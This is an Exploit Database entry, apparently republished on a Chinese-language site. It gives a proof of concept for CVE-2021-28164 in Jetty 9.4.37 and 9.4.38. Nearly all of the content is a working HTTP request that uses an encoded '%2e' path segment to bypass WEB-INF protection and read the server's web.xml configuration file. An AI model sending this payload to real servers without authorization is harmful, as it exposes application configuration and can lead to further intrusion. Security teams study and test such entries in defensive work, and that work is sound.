Jetty 9.4.37.v20210219 – Information Disclosure

• Exploit Database
• 16 阅读

• 作者： Mayank Deshmukh
  日期： 2021-10-22
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/50438/

• # Exploit Title: Jetty 9.4.37.v20210219 - Information Disclosure 
  # Date: 2021-10-21
  # Exploit Author: Mayank Deshmukh
  # Vendor Homepage: https://www.eclipse.org/jetty/
  # Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.37.v20210219/
  # Version: 9.4.37.v20210219 and 9.4.38.v20210224
  # Tested on: Kali Linux
  # CVE : CVE-2021-28164
  
  POC #1 - web.xml
  
  GET /%2e/WEB-INF/web.xml HTTP/1.1
  Host: localhost:8080
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Connection: close
  Upgrade-Insecure-Requests: 1
  Cache-Control: max-age=0